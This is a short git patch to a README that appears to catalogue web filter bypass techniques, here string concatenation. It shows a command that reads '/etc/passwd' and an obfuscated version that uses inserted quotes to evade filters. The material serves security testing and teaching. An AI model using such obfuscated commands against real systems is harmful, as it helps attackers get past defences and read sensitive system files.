From 0e2ede28d9a0a6183e306e09becbfbdd60dc4dcf Mon Sep 17 00:00:00 2001 From: 0xInfection Date: Fri, 8 Mar 2019 11:01:37 +0530 Subject: [PATCH] Payload edited --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 6863ee8..af3ff2c 100644 --- a/README.md +++ b/README.md @@ -1940,8 +1940,8 @@ __9. String Concatenation__ - Different programming languages have different syntaxes and patterns for concatenation. - This allows us to effectively generate payloads that can bypass many filters and rules. -__Standard__: `alert()` +__Obfuscated__: `` __Standard__: `/bin/cat /etc/passwd` __Obfuscated__: `/bi'n'''/c''at' /e'tc'/pa''ss'wd`